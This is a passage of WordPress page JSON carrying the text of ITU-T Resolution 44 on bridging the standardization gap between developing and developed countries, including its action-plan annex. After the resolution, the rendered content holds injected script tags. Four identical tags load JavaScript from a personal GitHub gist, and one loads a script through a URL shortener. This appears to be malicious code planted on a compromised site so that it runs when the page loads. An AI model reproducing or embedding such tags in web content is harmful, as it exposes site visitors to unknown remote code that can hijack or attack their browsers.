Recommendations, on the specific needs and requirements of developing countries, in order to broaden the appeal and applicability of the Recommendations in those countries,<\/span><\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_981402328FM\" class=\"exp\"><span>invites the Director of the Telecommunication Standardization Bureau<\/span>\n<ul class=\"sub\">\n<li class=\"basic\"><span>1  to work closely with the Directors of BDT and the Radiocommunication Bureau (BR) in order to encourage the formation of partnerships under the patronage of ITU-T as one of the means for financing the action plan;<\/span><\/li>\n<li class=\"basic\"><span>2  to consider holding, whenever possible, workshops concurrently with the ITU-T regional groups meetings in coordination and collaboration with the Director of the BDT,<\/span><\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_1832981162FM\" class=\"exp\"><span>invites regions and their Member States<\/span>\n<ul class=\"sub\">\n<li class=\"basic\"><span>1  to pursue the creation of regional groups of parent ITU-T study groups in their respective regions in accordance to resolves 5 of this Resolution and Resolution 54, and to support its meetings and activities as appropriate in coordination with the TSB;<\/span><\/li>\n<li class=\"basic\"><span>2  to take an active part in the activities of the ITU-T regional groups and support regional organizations in setting up regional frameworks for the development of standardization activities;<\/span><\/li>\n<li class=\"basic\"><span>3  to create regional standardization bodies, as appropriate, and encourage its joint and coordinated meetings with the ITU-T Study Groups&#8217; regional groups in the respective region, to the effect that these standardization bodies be an umbrella for such regional groups meetings;<\/span><\/li>\n<li id=\"FMFreemind_Link_85556640FM\" class=\"basic\"><span>4  to develop draft terms of reference and working methods for regional groups, which are to be approved by the parent study group,<\/span><\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_1551795497FM\" class=\"exp\"><span>encourages Member States and Sector Members<\/span>\n<ul class=\"sub\">\n<li class=\"basic\"><span>to take the objectives set out in the action plan in the Annex to this Resolution into account in their participation in ITU-T.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<li id=\"FMFreemind_Link_29860702FM\" class=\"exp\"><span>ANNEX (TO RESOLUTION 44)<\/span>\n<ul class=\"sub\">\n<li class=\"col\"><span>Action plan for the implementation of Resolution 123 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference<\/span>\n<ul class=\"subexp\">\n<li id=\"FMFreemind_Link_1861119974FM\" class=\"exp\"><span>I  Programme 1: Strengthening standard-making capabilities<\/span>\n<ul class=\"sub\">\n<li class=\"col\"><span>1)  Objective<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\"><span>\u2022  To improve the standard-making capabilities of developing countries.<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"col\"><span>2)  Activities<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\"><span>\u2022  Developing guidelines to assist developing countries in their involvement in ITU-T activities, such as but not limited to, ITU-T working methods, formulating draft Questions and in making proposals.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Creating methods to increase the access of developing countries to essential technical information in order to enhance their knowledge and capacity (i) to implement global standards, (ii) to effectively contribute to the work of ITU-T, (iii) to include their own specificities and necessities in the global standard-making process, and (iv) to influence global standard-making discussions by having active roles in ITU-T study groups.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Improving  procedures and electronic tools for remote participation in order to enable experts in developing countries to  actively  participate in the  ITU-T meetings (including TSAG,  study  groups,  joint  coordination  activities,  global  standardization  initiatives amongst others), workshops and trainings from their own countries.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Conducting consultancy projects designed to support developing countries  in the development of standardization plans, strategies, policies, etc. The outputs should be further transformed into best practices.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Developing methods, tools and indicators for accurate measurement of the results and the level of effectiveness of the  efforts and activities applied in bridging the standardization gap.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Working with Sector Members, manufacturers and academia, research and development organizations in particular, on exchanging information on new technologies and requirements of developing countries, and on providing technical assistance to encourage the establishment of standardization programmes in academia and research and development organizations in the field of information and communication technology.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_254860062FM\" class=\"exp\"><span>II  Programme 2: Assisting developing countries in respect to standards application<\/span>\n<ul class=\"sub\">\n<li class=\"col\"><span>1)  Objective<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\"><span>\u2022  To assist developing countries in:<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Ensuring that developing countries have a clear understanding of ITU-T Recommendations.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Enhancing the application of ITU-T Recommendations in developing countries.<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"col\"><span>2)  Activities<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\"><span>\u2022  To assist developing countries in:<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Establishing a standardization secretariat to coordinate standardization activities and participation in ITU-T study groups.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Determining whether their existing national standards are consistent and in accordance with the current ITU-T Recommendations.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Actions to be performed by TSB with BDT cooperation<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Developing a set of guidelines on how to apply ITU T Recommendations, in particular on manufactured products and interconnection,  with emphasis on Recommendations having regulatory and policy implications.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Provide advice and assistance on how to better utilize and adopt ITU-T Recommendations in national standards<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Compiling and maintaining a database containing information on new technologies that are standardized, as well as products that are compliant to ITU-T Recommendations.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Organizing  capacity-building events  on the application of specific Recommendations and on methods of examining compliance of manufactured products with these Recommendations.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Improving  and promoting  the use of an electronic forum for \u201cquestions and answers on  standards\u201d where developing countries can raise questions concerning their understanding and application of Recommendations and seek advice from study group experts.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_314728599FM\" class=\"exp\"><span>III  Programme 3: Human resource building<\/span>\n<ul class=\"sub\">\n<li class=\"col\"><span>1)  Objective<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\"><span>\u2022  To increase the human resource capacity of developing countries in ITU-T and national standardization activities.<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"col\"><span>2)  Activities<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\"><span>\u2022  Promote events, seminars,  workshops and study  group meetings at the regional and global level to build capacities regarding matters relevant to standardization and the development of telecommunications and ICT in developing countries.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  In close collaboration with BDT and BR, providing training courses on standardization to developing countries.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Providing more internship, secondment and short-term employment, etc., opportunities for developing countries at ITU.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Encouraging the election of more candidates from developing countries to ITU-T study groups chairmanship and vice-chairmanship positions.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Encouraging secondment and short-term employment opportunities for developing countries experts in test laboratories of international standards development organizations (SDOs) and manufacturers, in particular in the area of conformance and interoperability testing.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Organizing in-depth tutorials on implementation of ITU-T Recommendations.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Provision, by the TSB, of fellowships to eligible countries to attend relevant ITU-T meetings.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_197336128FM\" class=\"exp\"><span>IV  Programme 4: Fundraising for bridging the standardization gap<\/span>\n<ul class=\"sub\">\n<li class=\"col\"><span>a)  Contributions to the action plan in the following forms of partnerships and others means:<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\"><span>\u2022  Partnership contributions.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Additional budget allocated by ITU.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Voluntary contributions by developed countries.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Voluntary contributions by the private sector.<\/span><\/li>\n<li class=\"basic\"><span>\u2022  Voluntary contributions by others.<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"col\"><span>b)  Management of funds by TSB:<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\"><span>\u2022  The Director of TSB, in close coordination with  the Director of  BDT, shall be responsible for the management of funds raised as above, which shall be used principally for achieving the objectives of these programmes.<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"col\"><span>c)  Principles for use of funds:<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\"><span>\u2022  Funds are to be used for ITU-related activities including, but not limited, to assistance and consultation, training, of representatives of developing countries in ITU-T activities, as well as studying, compliance examination, interconnection and interoperability programmes for developing countries (but not for the purchase of equipment)<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WTSA RESOLUTION 44 (Florian\u00f3polis, 2004; Johannesburg, 2008; Dubai, 2012) Bridging the standardization gap between developing 1 and developed countries The World Telecommunication Standardization Assembly (Dubai, 2012), considering a) that Resolution 123 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference on bridging the standardization gap between developing and developed countries instructs the Secretary-General and the Directors of [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1545,"menu_order":44,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-313","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/313","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=313"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/313\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1545"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=313"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}